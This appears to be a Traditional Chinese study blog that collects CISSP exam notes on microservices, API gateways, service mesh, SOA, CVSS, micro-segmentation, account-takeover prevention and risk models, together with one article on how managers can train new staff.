攻擊者在嘗試猜測出帳號密碼,進而取得帳號控制權的方式,依據方法的精細程度,可區分成4種──從早期的暴力破解和字典攻擊,後來為了避免被受害單位察覺,並遭到系統鎖定,陸續出現了密碼潑灑與帳號填充攻擊手法。資料來源:ForceShield,iThome整理,2019年5月

資料來源:https://www.ithome.com.tw/news/131019

分類
CISSP

微服務的應用程序-會話層是ISO OSI模型的服務程序(即sidecar代理)所屬的層

https://ithelp.ithome.com.tw/upload/images/20211101/20132160PLcP3CGBgQ.png
-API 網關和服務網格(來源:Liran Katz)

服務網格(service mesh)是便於一個專用基礎設施層服務對服務的通信通過服務發現,路由和內部負載均衡,流量的結構,加密,認證和授權,指標和監測。
它提供了在由於服務實例脫機和不斷重定位而導致網路拓撲變化的環境中通過策略聲明性地定義網路行為、節點身份和流量流的能力。
它可以被視為一種網路模型,它位於開放系統互連 (OSI) 模型(例如,傳輸控制協議/互聯網協議 (TCP/IP))的傳輸層之上的抽象層,並處理服務的會話層(OSI 模型的第 5 層)關注。然而,細粒度的授權可能仍然需要在微服務上執行,因為這是唯一完全了解業務邏輯的實體。
服務網格概念上有兩個模塊——數據平面和控制平面。在數據平面承載通過服務特定代理服務實例之間的應用請求的流量。所述控制平面配置數據平面,提供了一種用於遙測點聚集,以及用於通過各種特徵,諸如負載平衡,斷路,或速率限制修改網路的行為提供API。
來源:NIST SP 800-204

參考
NIST SP 800-204
邊車模式(Sidecar pattern)

資料來源: Wentz Wu QOTD-20210824

分類
Project Management

好好說話》主管兩難:教多了員工不思考,教太少卻怕出包⋯怎麼辦

摘要

1.教新人是管理基本功,但對忙碌的主管來說,這項差事卻可能費時費力,成效不彰。

2.教導例行性工作時,要先確認對方的程度,由主管演示一遍,再請對方操作一遍,確認要注意之處。

3.本文整理了例行性工作教學的理想步驟,以及教學時須注意的2個觀念。

王主任最近的心情不太美麗。公司新進幾位員工,每一個都非常難帶。

像是昨天,王主任拿了一本手冊要新人A影印:「20頁到25頁,你去幫我印18份。」印完一看,頁面沒有置中,紙張一對摺,左半頁的字就被切掉。「你要細心一點啊!這是給客戶的資料,很多人會把資料對摺再看,印的時候手冊裝訂處要對準中央,懂嗎?印了18份都不能用,快去重印!」

A一臉委屈地走了,過了5分鐘,他回來,王主任又一頓罵:「中間都變黑,字看不清楚啊!還有些字都扭曲變形了,你印的時候,要把書完全攤開用力壓住啊!」

好不容易印好18份影本,會議開始後⋯⋯王主任又跑出會議室:「喂,多來了兩個客戶,你再去印兩份來。啊?你不知道原稿在哪?這不是你剛才印的嗎?你怎麼都不會用點心?」

經過一陣折騰,王主任決定改變作法。今天,同份會議資料,他請新人B去印。這次,他給了詳盡指示,他把B帶到影印機旁,一邊講解、一邊把影印機的按鍵操作全部一次,印出一份完美影本。

他拍拍B的肩膀:「好了,你接著做吧!」結果B僵在原地,一副不知所措的樣子。

「我剛不是教過一次了嗎?」王主任很納悶。

主管們,別讓你的員工「思考外包」

王主任做錯了什麼?錯在他沒有先釐清兩位新人對影印工作的上手程度。王主任幾乎天天影印,但新進年輕員工,可能平時都用電腦,用筆寫字的機會都少,何況使用影印機。

教導例行性工作時,建議先問下屬:「我想請你去做這件事,你會嗎?」這句話不只能夠釐清對方對工作的熟悉度,也能引導對方提問,避免下屬陷入明明不懂、卻不敢問的情況。

人類有個不可思議的習性,當身邊有人仔細教學時,就會產生「反正我不想,他也會幫我想」的偷懶想法,變得不願思考。凡事幫下屬打點妥貼的主管,因此可能帶出「思考外包」的下屬。

理想的教學步驟,是在確認對方程度後,先示範操作一次,接著讓對方做一次,中途不插嘴、不插手,看到有錯也要忍住,留時間給對方檢查錯誤。等到對方說「我覺得應該可以了」,再一起檢查,逐一告知要注意的地方。確認對方正確操作一次後,先行離開,告訴對方「做完再叫我」,讓他獨立完成工作。

當主管不在場了,下屬遇到困難,就不會直接開口問,反而會回想主管示範的步驟、自己剛才操作的過程。記憶更深刻,重複幾次後,自然會做得更有效率。

你可以這樣做

1.別急著給答案

承上,凡事幫忙想好答案的主管,只會帶出被動、不愛動腦的下屬。作為主管,給出明確指示確實重要,但也要留下一些素材給下屬思考。

以王主任來說,若新人來問「要印幾份?」他可以回:「預計18人參加,不過有時也會有人不請自來,你覺得怎麼辦才好?」

新人可能會答:「不然我多印3份?」

這時可以繼續引導:「是不錯,但萬一用不到那3份,會很浪費紙。」

盡量提供思考線索,新人可能就會想到「不然我先帶著原稿,開會前再確認一次人數,份數不夠再補印。」

2.忍住「自己來比較快」的念頭

獨當一面的下屬,可以讓主管更輕鬆,但培育要花時間。自身能力強的主管,尤其容易因為下屬動作太慢而火大,因此萌生「與其交給他,不如自己做比較快」的念頭。

但,如果王主任很急躁,往後遇到影印問題,都決定自己處理。那他的行事曆,勢必排滿各種緊急卻不重要的任務。

主管之所以為主管,是因為擔負著管理的工作:規劃、組織、領導、控制。處理文書、操作機具、外部聯繫,這些都不是管理的工作。身為主管,要有管理自覺,耐住性子、放手練兵,才能帶出獨當一面的下屬。

*本文經整理參考自《給主管的教科書》(商周出版)

資料來源:https://www.businessweekly.com.tw/management/blog/3008084?utm_source=facebook.com&utm_medium=social&utm_content=bw&utm_campaign=content&fbclid=IwAR2n2Qb_6oDdKwIgLcJvYp9CiPxWpdAO9pBv2TmxHoYlmRSZuyjH3I1MJLE

分類
CISA

SOAP(Simple Object Access Protocol)

OAP(原為Simple Object Access Protocol首字母縮寫,即簡單物件存取協定)是交換資料的一種協定規範,使用在電腦網路Web服務(web service)中,交換帶結構的資訊。SOAP為了簡化網頁伺服器(Web Server)從XML資料庫中提取資料時,節省去格式化頁面時間,以及不同應用程式之間按照HTTP通信協定,遵從XML格式執行資料互換,使其抽象於語言實現、平台和硬體。此標準由IBMMicrosoftUserLandDevelopMentor在1998年共同提出,並得到IBM、蓮花(Lotus)、康柏(Compaq)等公司的支援,於2000年提交給全球資訊網聯盟World Wide Web Consortium,W3C),目前SOAP 1.1版是業界共同的標準,屬於第二代的XML協定(第一代具主要代表性的技術為XML-RPC以及WDDX)。

資料來源:https://zh.wikipedia.org/wiki/%E7%AE%80%E5%8D%95%E5%AF%B9%E8%B1%A1%E8%AE%BF%E9%97%AE%E5%8D%8F%E8%AE%AE

分類
CISSP

微服務-API 閘道器

https://ithelp.ithome.com.tw/upload/images/20211028/20132160vo7Cp5OeRE.png
-API 閘道器和服務網格(來源:Liran Katz)
實施 API 閘道器以促進跨境通信;他們控制著南北和東西向的交通。外部或邊緣 API 閘道器將來自客戶端的入站請求路由到適當的服務;內部 API 閘道器促進了各種服務網格範圍之間的通信。服務網格促進特定範圍內的服務到服務通信。
API 閘道器架構可以是整體式的,也可以是分佈式的。
在整體式API 閘道器架構中,通常只有一個 API 閘道器部署在企業網路的邊緣(例如,非軍事區 (DMZ)),並在企業級為 API 提供所有服務。
在分佈式API閘道器架構中,有多個微閘道器實例,部署在更靠近微服務API的地方。微閘道器通常是低的覆蓋區,其可以被用來定義和執行自定義策略,因此適合用於基於微服務的應用程序,必須通過特定的服務的安全策略來保護可腳本API閘道器。
微閘道器通常作為使用 Node.js 等開發平台的獨立容器實現。它不同於服務網格架構的 sidecar 代理,後者是在 API 端點本身實現的。
來源:來源:NIST SP 800-204

服務網格(Service Mesh)
服務網格是一個專用的基礎設施層,它通過服務發現、路由和內部負載平衡、流量配置、加密、身份驗證和授權、指標和監控來促進服務到服務的通信。
服務網格為微服務應用程序中的每個服務創建一個小型代理服務器實例。這種專門的代理汽車有時在服務網格術語中被稱為“ sidecar 代理”。Sidecar 代理形成了數據平面,而執行安全性(訪問控制、通信相關)所需的運行時操作是通過從控制平面向 sidecar 代理注入策略(例如訪問控制策略)來啟用的。這也提供了在不修改微服務代碼的情況下動態更改策略的靈活性。
來源:NIST SP 800-204

API閘道器(API Gateway)
API 閘道器的主要功能是始終將入站請求路由到正確的下游服務,可選擇執行協議轉換 (即 Web 協議之間的轉換,例如 HTTP 和 WebSocket,以及內部使用的 Web 不友好協議,例如作為 AMQP 和 Thrift 二進制 RPC)並且有時組合 requests。在極少數情況下,它們被用作前端后端 (BFF) 的一部分,從而支持具有不同外形因素(例如,瀏覽器、移動設備)的客戶端。
來自客戶端的所有請求首先通過 API 閘道器,然後將請求路由到適當的微服務。API 閘道器通常會通過調用多個微服務並聚合結果來處理請求。
由於API閘道器是微服務的入口點,所以它應該配備必要的基礎服務(除了其主要的請求整形服務),如服務發現、認證和存取控制、負載平衡、緩存、提供自定義API對於每種類型的客戶端,應用感知健康檢查、服務監控、攻擊檢測、攻擊響應、安全日誌記錄和監控以及斷路器。
來源:NIST SP 800-204

參考
NIST SP 800-204
網路層複習
服務網格與 API 閘道器:有什麼區別?
API 閘道器和服務網格的區別
API 閘道器與服務網格
API 閘道器和服務網格:打開應用現代化的大門

資料來源: Wentz Wu QOTD-20210823

分類
CISSP

ATO Attack

什麼是 ATO 攻擊?

通過 SolarWinds Passportal 2019 年 12 月 30 日

帳戶接管 (ATO) 攻擊呈上升趨勢,使個人和企業面臨財務損失和聲譽受損的風險。這些攻擊涉及登錄憑據的洩露——通常針對在線帳戶或云平台。例如,在個人層面,ATO 對個人賬戶的攻擊可能會導致最終用戶意識到黑客入侵了他們的銀行或亞馬遜賬戶。然而,商業環境中的 ATO 攻擊在範圍上可能更具破壞性。

鑑於 ATO 攻擊可能造成嚴重後果,託管服務提供商 (MSP) 應了解密碼安全與 ATO 攻擊之間的關係,以幫助其客戶避免成為欺詐活動的受害者。

什麼是 ATO 攻擊?

帳戶接管攻擊本質上是身份盜竊的一種形式。身份盜竊涉及竊取和使用個人身份識別信息 (PII),例如駕照號碼或社會安全號碼,以冒充他人。ATO 攻擊是身份盜竊的一種形式,黑客使用竊取的 PII 訪問在線帳戶,例如電子商務、銀行或電子郵件帳戶。

這種類型的帳戶接管很難被發現,並且通常會導致被盜帳戶上的欺詐交易。ATO 攻擊可能會給敏感信息被盜的人帶來費用或其他損失。黑客可能會使用被盜用的帳戶來轉移資金、進行購買或將數據用於其他目的。如果這種情況發生在業務環境中,則會影響生產力和公司安全。ATO 攻擊很容易損害公司聲譽——尤其是在違規行為很普遍的情況下。

ATO 攻擊的步驟是什麼?

ATO 攻擊通常包括以下步驟:

  • 數據洩露:數據洩露可能由於系統、網絡或網站中的漏洞而發生。在違規期間,黑客可能會訪問用戶名、電子郵件、密碼或帳戶安全問題和答案等信息。
  • 憑據破解:憑據破解或填充是犯罪者試圖發現和使用完整登錄憑據的過程,通常是通過自動化機器人。黑客可能會猜測密碼,使用單詞列表方法,或者只是通過機器人使用蠻力。這些操作可能會導致無效登錄嘗試突然增加——這是黑客試圖訪問帳戶的潛在跡象。
  • 金融交易:竊取用戶名和密碼的黑客實際上可能不會將它們用於 ATO 攻擊——他們可能會在暗網上出售這些敏感數據,供更專業的 ATO 黑客購買和使用。
  • 欺詐性帳戶使用:當黑客確實決定對帳戶執行欺詐性操作時,這些行為可能有多種形式。例如,不良行為者可能會竊取更多敏感數據,例如地址。他們可能會直接竊取資金。對於電子商務網站,他們可能會利用用戶的信用或獎勵。如果他們訪問您的電子郵件,他們可能會使用您的帳戶發送垃圾郵件或網絡釣魚電子郵件。在許多情況下,直到事後很久才發現損壞。

我的密碼是否安全免受 ATO 攻擊?

許多身份盜竊的受害者甚至可能不知道他們的數據已被盜。您的用戶名、電子郵件或密碼可能已經成為數據洩露的一部分。雖然有一些簡單的工具可以幫助您檢查您的信息是否存在於暗網上,但針對 ATO 攻擊的最佳防禦是智能預防。

為防止 ATO 攻擊,最終用戶和公司等應考慮一些安全和密碼最佳實踐。這些預防措施有助於確保盡可能保護客戶信息。

設置密碼要求: 您不一定需要使用強密碼生成器,但公司應該要求強密碼,如美國國家標準與技術研究院 (NIST)的最新指南所述。這些密碼要求包括: 

  • 至少需要八個字符,但不一定需要任何特殊字符。
  • 限制序列或重複。
  • 避免使用特定於上下文的詞和常用密碼。
  • 請記住——不一定需要混合使用大小寫字母和特殊字符。
  • 重要的是,需要根據已洩露密碼列表篩選新密碼。

考慮強密碼示例: 對於最終用戶,了解說明上述某些原則的強密碼想法可能會有所幫助。例如,避免僅使用英語單詞或單詞模式,例如“ILoveCats”。機器人可以非常快速地測試“字典”詞——尤其是常用詞,比如“密碼”。但是,包含數字或添加額外的單詞以獲得更高的字符數會很有用。 

應用更新:未能更新和修補軟件或網站可能導致黑客急於利用的漏洞。確保也更新防病毒軟件。

使用多因素解決方案:雙因素或多因素身份驗證解決方案(可能需要電子郵件或文本確認以確認用戶身份)比傳統登錄更安全。 

設置安全規則:某些安全規則和措施可以幫助防範黑客。嘗試只允許固定次數的登錄嘗試,永久阻止已知為惡意的 IP 地址,並確保充分的防火牆保護。像 CAPTCHA 這樣的工具可以幫助防止機器人自動登錄。

實施密碼管理工具: 使用密碼管理工具是確保高度安全的極好方法。密碼工具可以支持身份驗證功能、快速密碼重置功能、審計和憑據注入(在不洩露明文的情況下應用憑據的過程)。

實施密碼保護

如果您是希望為客戶提供密碼保護的 MSP,請從 SolarWinds ® Passportal開始。Passportal 專為希望為客戶提供符合最佳實踐和合規性要求的密碼管理的MSP 構建

使用 Passportal,MSP 可以輕鬆設置密碼要求,並確保客戶能夠在發生 ATO 攻擊時快速更改密碼。該工具還提供了一個自動強密碼生成器,以幫助防止憑據黑客攻擊並防止 ATO 攻擊。如果您正在尋找一種方法來保護客戶免受所有太常見的帳戶接管,請從SolarWinds Passportal的演示開始。

資料來源:https://www.passportalmsp.com/blog/what-is-an-ato-attack

分類
CISSP

微服務(microservices)

https://ithelp.ithome.com.tw/upload/images/20211026/20132160hOiqBvwcvp.png
-微服務架構
微服務是一種分佈式架構風格。它具有多種優點,例如:
. 可以提高可擴展性。
. 開發團隊可以獨立工作並變得更加敏捷。
. 服務的獨立性提高了代碼的可重用性。
. 系統的整體架構可以與組織結構保持一致。
但是,由於分佈式架構的性質,微服務的可用性、可管理性和監控可能需要更多的開銷。可擴展性和可用性的概念經常被混淆。可伸縮性是關於服務可以服務多少客戶端,而可用性是客戶端可以可靠和及時地訪問服務的程度。
服務或系統可以採用不同的可擴展性策略,例如,縱向擴展或橫向擴展。擴展策略可能不會提高可用性。橫向擴展策略在不同程度上有助於提高可用性,例如,沒有心跳檢查的基於 DNS 的循環負載均衡器呈現的可用性程度低於檢查服務健康狀態的基於集群的負載均衡器。
以下是 NIST SP 800-204 的摘錄:

微服務的優勢
. 對於大型應用程序,將應用程序拆分為鬆散耦合的組件可以實現分配給每個組件的開發團隊之間的獨立性。然後,每個團隊都可以通過選擇自己的開發平台、工具、語言、中間件和硬件來優化,基於它們對正在開發的組件的適用性。
. 每個組件都可以獨立縮放。資源的有針對性的分配導致資源的最大利用。
. 如果組件具有 HTTP RESTful 接口,只要接口保持不變,就可以在不中斷應用程序整體功能的情況下更改實現。
. 每個組件中涉及的代碼庫相對較小,使開發團隊能夠更快地生成更新,並為應用程序提供響應業務流程或市場條件變化的敏捷性。
. 組件之間的鬆散耦合能夠抑制微服務的中斷,從而將影響限制在該服務上,而不會對其他組件或應用程序的其他部分產生多米諾骨牌效應。
. 當組件使用異步事件處理機制鏈接在一起時,組件中斷的影響是暫時的,因為所需的功能將在組件再次開始運行時自動執行,從而保持業務流程的整體完整性。
. 通過將服務定義與業務能力對齊(或通過基於業務流程或能力的整體應用程序功能的分解邏輯),基於微服務的系統的整體架構與組織結構保持一致。當與組織單位相關的業務流程發生變化並因此需要修改和部署相關服務時,這促進了敏捷響應。
. 微服務的獨立功能特性促進了跨應用程序的代碼更好的可重用性。
. 必須監控多個組件(微服務)而不是單個應用程序。需要一個中央控制台來獲取每個組件的狀態和應用程序的整體狀態。因此,必須創建具有分佈式監控和集中查看功能的基礎設施。
. 多個組件的存在會造成可用性問題,因為任何組件都可能隨時停止運行。
. 一個組件可能必須為某些客戶端調用另一個組件的最新版本,並為另一組客戶端調用同一組件的先前版本(即版本管理)。
. 運行集成測試更加困難,因為需要一個測試環境,其中所有組件都必須工作並相互通信。
. 當基於微服務的應用程序內的交互設計為 API 調用時,必須實現安全 API 管理所需的所有必要流程。
. 微服務架構可以分解縱深防禦的做法。許多架構都有一個運行在 DMZ 中的 Web 服務器,預計會受到威脅,然後是 Web 服務器與之通信的後端服務,最後是後端服務與之通信的數據庫。後端服務可以充當暴露的 Web 服務器和數據庫中的敏感數據之間更堅固的層。微服務架構往往會破壞這一點,現在 Web 服務器和後端服務被分解為微服務,可能比以前的模型暴露得更多。這會導致調用者和敏感數據之間的保護層更少。因此,安全地設計和實現微服務本身以及服務網格或API 網關部署模型。

參考
NIST SP 800-204

資料來源: Wentz Wu QOTD-20210822

分類
CISSP

面向服務的架構 (SOA)、Web 服務和微服務

https://ithelp.ithome.com.tw/upload/images/20211025/20132160gPcsiV1rta.jpg
-面向服務的架構 (SOA)
面向服務的架構 (SOA) 可以通過 Web 服務或微服務來實現。Web 服務方法導致 SOA,而微服務架構是 SOA 的擴展。基於 SOA 的企業應用程序集成 (EAI) 通常為企業應用程序實現共享的企業服務總線 (ESB) 以交換消息。微服務託管在一個或多個容器中,這些容器在 Google Kubernetes (K8S)、Docker Swarm 或 Apache Mesos 的編排下協作。

面向服務的架構 (SOA)
服務是一個自包含的松耦合邏輯。在 SOA 中,傳統的單體應用程序被劃分為協作以實現共同目標的服務。服務提供商向私人或公共服務註冊機構註冊服務;服務消費者根據註冊中心查找或發現感興趣的服務以消費(綁定和調用)這些服務。
-SOA 的查找-綁定-執行範式(來源:Qusay H. Mahmoud)
“幾年前,IBM、微軟和 SAP 曾經託管公共 UDDI 服務器,但現在已經停產了。”
https://ithelp.ithome.com.tw/upload/images/20211025/20132160zvejsQ5fti.jpg
~ user159088 on stackoverflow
https://ithelp.ithome.com.tw/upload/images/20211025/2013216028cuEcZdQk.png
-SOA 元模型,The Linthicum Group,2007

微服務
微服務:微服務是一個基本元素,它源於將應用程序的組件架構分解為鬆散耦合的模式,這些模式由自包含的服務組成,這些服務使用標准通信協議和一組定義良好的 API 相互通信,獨立於任何供應商、產品或技術。
微服務是圍繞能力構建的,而不是服務,構建在 SOA 之上,並使用敏捷技術實現。微服務通常部署在應用程序容器內。
資料來源:NIST SP 800-180(草案)

容器編排
https://ithelp.ithome.com.tw/upload/images/20211025/20132160pFFykVlUwI.png
-Mesos、Swarm 和 Kubernetes(來源:Nane Kratzke
https://ithelp.ithome.com.tw/upload/images/20211025/2013216084Za3rKWKO.png
-Kubernetes 架構(來源:Dorothy Norris)

參考
SOA宣言
面向服務的架構
是否有任何公共 UDDI 註冊中心可用?
UDDI 註冊中心:可由啟用總線的 Web 服務引用的 Web 服務目錄
模式:微服務架構
2019年容器編排
使用 Kubernetes、Docker Swarm 和 Mesos 進行 Neo4j 容器編排
Kubernetes vs. Mesos——架構師的視角
Apache Mesos PNG 4
SOA 與微服務:有什麼區別?
企業服務總線
企業應用集成
面向服務的架構 (SOA) 和 Web 服務:企業應用程序集成 (EAI) 之路
面向服務架構的 Web 服務方法

資料來源: Wentz Wu網站

分類
CISSP

NIST 通用風險模型-威脅來源

https://ithelp.ithome.com.tw/upload/images/20211019/20132160IrgoB7nC2L.jpg
-NIST 通用風險模型 (NIST SP 800-30 R1)
NIST 通用風險模型描述了威脅源如何發起利用漏洞導致不利影響的威脅事件(例如,TTP、策略、技術和程序)。垃圾郵件發送者、恐怖分子和機器人網絡運營商是威脅來源,而網絡釣魚則是威脅事件。
風險與威脅
https://ithelp.ithome.com.tw/upload/images/20211019/20132160b5MvBtKgcI.jpg
-什麼是風險?

資料來源: Wentz Wu QOTD-20210818

分類
CISSP

驗證及確認

驗證及確認(Verification and validation)兩者是獨立的過程,若兩者一起使用,可以用來檢查產品、服務或系統滿足需求規格並且符合其原來預期的目的[1]。這些是品質管理系統(例如ISO 9000)的關鍵組件。有時會在「驗證及確認」前面加上「獨立」(independent)一詞,表示驗證及確認是由公正的第三方執行的。「獨立驗證及確認」可以簡稱為「IV&V」。

在實務上,在質量管理方面,驗證及確認的定義可以不一致。有時甚至可以交換使用[2][3][4]

電氣電子工程師學會(IEEE)採用的標準PMBOK指南中在第 4 版中的定義如下 [5]

  • 「確認(Validation):保證產品、服務或系統滿足客戶和其他已識別的利益相關者的需求。它通常涉及外部客戶的接受度和適應性。與驗證形成對比。」
  • 「驗證(Verification):評估產品、服務或系統是否符合規定、需求、規格或其他附加條件。多半是組織內部的流程。與確認形成對比。」

資料來源:https://zh.wikipedia.org/wiki/%E9%A9%97%E8%AD%89%E5%8F%8A%E7%A2%BA%E8%AA%8D

分類
CISSP

通用漏洞評分系統 (CVSS)

https://ithelp.ithome.com.tw/upload/images/20211013/20132160ufJCtaw4OH.jpg
-CVSS 指標組(來源:FIRST
通用漏洞評分系統 (CVSS) 標准定義了三個指標組:基本、時間和環境指標組。基本指標組是強制性的,而時間和環境指標組是可選的。
基本指標組有兩個指標集,可利用性指標和影響指標,用於評估風險。風險包括兩個關鍵因素:不確定性(可能性或可能性)和影響(影響)。針對風險可能性或可能性的漏洞可利用性標準。如果一個風險的可能性很大,但對安全目標(機密性、完整性和可用性)沒有影響,那麼它就無關緊要或不是風險。
https://ithelp.ithome.com.tw/upload/images/20211013/201321609fehbo5rCq.jpg
-CVSS 度量和方程(來源:FIRST

參考
通用漏洞評分系統 v3.1:規範文檔
常見漏洞評分系統計算器

資料來源: Wentz Wu QOTD-20210817

分類
CISSP

cissp重點_20211008

– 資安的定義: 手段、標的與目標

– 三階目標與風險管理: 1-2-3-4

– 安全控制措施的種類

– 戰略管理: 組成、形成與執行(政策框架與專案管理

– 將安全融入組織的各個業務流程: 人事與採購 (甲、乙、丙方及保證制度)

– 業務持續管理: 七步驟

– 資產安全: 盤點、分類、保護

– NIST RMF

– 資料治理: 企業自有資料與個資、智財、資料生命週期與狀態、資料清洗與殘留

– 存取控制概念: 主體、客體、安全核心及3A

– 隨意型存取控制(DAC)

– 安全評鑑、稽核與變更管理概念

– 日常維運及持續改善概念

– 工程的定義

– 意識、教育與訓練

分類
CISSP

微分段(micro-segmentation)

https://ithelp.ithome.com.tw/upload/images/20211007/201321600KtkR34xnM.jpg
-網路安全挑戰
虛擬可擴展局域網 (Virtual eXtensible Local Area Network :VXLAN)
虛擬可擴展 LAN (VXLAN) 是一種網路虛擬化技術,旨在解決與大型雲計算部署相關的可擴展性問題。VXLAN 規範最初由 VMware、Arista Networks 和 Cisco 創建。(維基百科)
它是一個軟體定義的覆蓋網路,它使用類似 VLAN 的封裝技術將 OSI 第 2 層以太網幀封裝在第 4 層 UDP 數據報中,使用 4789 作為 IANA 分配的默認目標 UDP 端口號。最常見的應用之一是連接docker 容器的覆蓋網路。
https://ithelp.ithome.com.tw/upload/images/20211007/20132160b7nZgyV6ZE.jpg
-Docker 覆蓋網路(來源:nigelpoulton)

軟體定義網路 (Software Defined Networks:SDN)
軟體定義網路 (SDN) 技術是一種網路管理方法,它支持動態的、以編程方式高效的網路配置,以提高網路性能和監控,使其更像雲計算,而不是傳統的網路管理。SDN 試圖通過將網路數據包的轉發過程(數據平面)與路由過程(控制平面)分離,將網路智能集中在一個網路組件中。控制平面由一個或多個控制器組成,這些控制器被認為是整合了整個智能的 SDN 網路的大腦。
資料來源:維基百科
https://ithelp.ithome.com.tw/upload/images/20211007/20132160nfPam8LBgu.png
-SDN架構
軟體定義的邊界 (Software Defined Perimeter:SDP)
軟體定義邊界 (SDP),也稱為“黑雲”,是一種計算機安全方法,它從 2007 年左右在全球信息網格 (GIG) 黑色核心網路計劃下國防信息系統局 (DISA) 所做的工作演變而來.
軟體定義邊界 (SDP) 框架由雲安全聯盟 (CSA) 開發,用於根據身份控制對資源的訪問。軟體定義邊界中的連接基於需要知道的模型,在該模型中,在授予對應用程序基礎設施的訪問權限之前驗證設備狀態和身份。
軟體定義的邊界通過使應用程序所有者能夠部署邊界來解決這些問題,這些邊界保留了傳統模型對外部不可見和不可訪問的價值,但可以部署在任何地方——在互聯網上、在雲中、在託管中心、在私人公司網路,或跨越部分或所有這些位置。
資料來源:維基百科
https://ithelp.ithome.com.tw/upload/images/20211007/20132160VyqhjKcQ8Q.jpg
-SDP架構

參考
微分段
什麼是微分段?
微分段與網路分段的區別
微分段:網路安全的下一次演變
2021 年最佳零信任安全解決方案
什麼是微分段?(帕洛阿爾托)
什麼是微分段?(VMware)
什麼是 VMware 虛擬化環境中的工作負載管理
軟體定義邊界中的微分段
SD-WAN、SDP、ZTNA……它們真的有那麼不同嗎?
安全智庫:SDN、容器、加密和SDP的安全作用
軟體定義的邊界:SDP 的架構視圖
利用微分段構建全面的數據中心安全架構
使用 NSX-T 3.0 為 VLAN 微分段準備集群

資料來源: Wentz Wu QOTD-20210815

分類
CISSP

軟件定義的邊界

一個軟件定義的邊界SDP),也被稱為“黑色的雲”,是一種方法的計算機安全,不同於在做的工作發展國防信息系統局(DISA)的下全球信息柵格(GIG)黑色核心網絡計劃2007 年左右。[1] 軟件定義邊界 (SDP) 框架由雲安全聯盟(CSA)開發,用於根據身份控制對資源的訪問。軟件定義邊界中的連接基於需要知道的模型,在該模型中,在授予對應用程序基礎設施的訪問權限之前驗證設備狀態和身份。[2]應用程序基礎設施實際上是“黑色的”(DoD 術語,表示無法檢測到基礎設施),沒有可見的DNS信息或IP 地址[可疑 –討論] 這些系統的發明者聲稱,軟件定義的邊界可以緩解最常見的基於網絡的攻擊,包括:服務器掃描拒絕服務 SQL 注入、操作系統和應用程序漏洞利用中間人middle pass-the-hash pass-the-ticket和其他未經授權用戶的攻擊。[3]

資料來源:https://en.wikipedia.org/wiki/Software-defined_perimeter

分類
CISSP

什麼是架構(What Is Architecture)?

https://ithelp.ithome.com.tw/upload/images/20211004/20132160pcCvD0HoO1.jpg
https://ithelp.ithome.com.tw/upload/images/20211004/20132160BTlD25iFRR.jpg
https://ithelp.ithome.com.tw/upload/images/20211004/20132160d67eCMMhPO.jpg
https://ithelp.ithome.com.tw/upload/images/20211004/20132160953CVb2bgW.jpg
https://ithelp.ithome.com.tw/upload/images/20211004/20132160kfsAtEoYs9.png
https://ithelp.ithome.com.tw/upload/images/20211004/20132160toWjdEj8lt.jpg
-計算機架構

作為解決方案最重要的工件,架構是一個對象(解決方案)從各種觀點或角度的概念、邏輯和物理表示,它確定了它的構建塊、關係、交互、邊界、接口、環境和上下文以及指導解決方案在其整個生命週期中的演變。
~ 吳文智

定義
. 系統或解決方案的一組相關的物理和邏輯表示(即視圖)。該體系結構在不同抽象級別和不同範圍內傳達有關係統/解決方案元素、互連、關係和行為的信息。(來源:NIST SP 800-160 第 1 卷)
. 與描述對象相關的一組設計人工製品或描述性表示,以便它可以按要求(質量)生產並在其使用壽命(變更)期間保持不變(來源:Zachman:1996,ISO/TR 20514:2005)
. 體現在其組件中的系統的基本組織、它們之間的關係以及與環境的關係,以及指導其設計和演變的原則(來源:ISO/IEC 15288:2008)
. 一套系統的概念和規則,描述了整個系統中實體之間的相互關係,獨立於硬體和軟體環境
注 1:架構是通過一系列可能處於不同級別的通用性的觀點來描述的/ specificity、abstraction/concept、totality/component等等。另請參見下文中的“通信視點”、“功能視點”、“組織視點”和“物理視點”定義。(來源:ISO/TR 26999:2012)
. 系統在其環境中的基本概念或屬性,體現在其元素、關係以及其設計和演變的原則中 (ISO/IEC/IEEE 42010:2011)
. 項目或元素的結構表示,允許識別構建塊、它們的邊界和接口,並包括對這些構建塊的需求分配(來源:ISO 26262-1:2018)
. 系統的概念結構
注 1:一個系統可能由幾個相互作用的子系統組成,每個子系統都有自己的體系結構。(來源:ISO/IEC TR 29108:2013)
. 邏輯結構和與組織和業務環境的相互關係所依據的一組原則
注 1:軟體架構是軟體設計活動的結果。(來源:ISO/TR18307:2001)
. 系統中硬體和軟體元素的特定配置(來源:IEC 61508-4)

資料來源: Wentz Wu網站

分類
CISSP

風險成熟度模型 (RMM)

RMM 解釋

風險管理基準和進展

風險成熟度模型 (RMM) 概述了構成可持續、可重複和成熟的企業風險管理 (ERM) 計劃的關鍵指標和活動。通過風險成熟度自我評估,組織可以衡量其當前風險管理實踐與 RMM 指標的一致性。完成後,每個組織都會獲得其計劃的成熟度評分,從最早階段和最低風險成熟度級別 Ad-Hoc(1 級)開始,並進展到最高級的風險成熟度級別領導(5 級) . 下面將概述 RMM 風險成熟度評估的每個組成部分、每個組成部分的評分方式以及評估的結果。

七大屬性

風險成熟度模型 (RMM) 確定了有效企業風險管理的七個關鍵屬性。這些屬性涵蓋 ERM 計劃的規劃和治理,以及評估的執行以及風險信息的匯總和分析。

最佳實踐 ERM 計劃的七個屬性或組成部分如下:

  • 採用基於 ERM 的流程該屬性衡量組織的風險文化,並考慮執行或董事會級別對企業風險管理的支持程度。
  • ERM 流程管理該屬性衡量組織在其文化和業務決策中採用 ERM 方法的程度,以及風險管理計劃遵循最佳實踐步驟以識別、評估、評估、減輕和監控風險的程度。
  • 風險偏好管理此屬性評估圍繞風險回報權衡、風險問責制、定義風險容忍度以及組織是否有效縮小潛在風險與實際風險之間的差距的意識水平。
  • 根本原因紀律此屬性評估組織根據來源或根本原因識別風險的程度,以及它們產生的症狀和結果。關注風險的根本原因並相應地對其進行分類將加強響應和緩解工作。
  • 發現風險此屬性衡量風險評估的質量和覆蓋範圍。它檢查收集風險信息的方法、風險評估過程,以及是否可以從風險信息中發現企業範圍的趨勢和相關性。
  • 績效管理該屬性決定了組織執行其願景和戰略的程度。它通過基於風險的流程評估規劃、溝通和衡量核心企業目標的強度,以及進展偏離預期的程度。
  • 業務彈性和可持續性該屬性評估業務連續性、運營規劃和其他可持續性活動採用基於風險的方法的程度。

能力驅動因素和指標

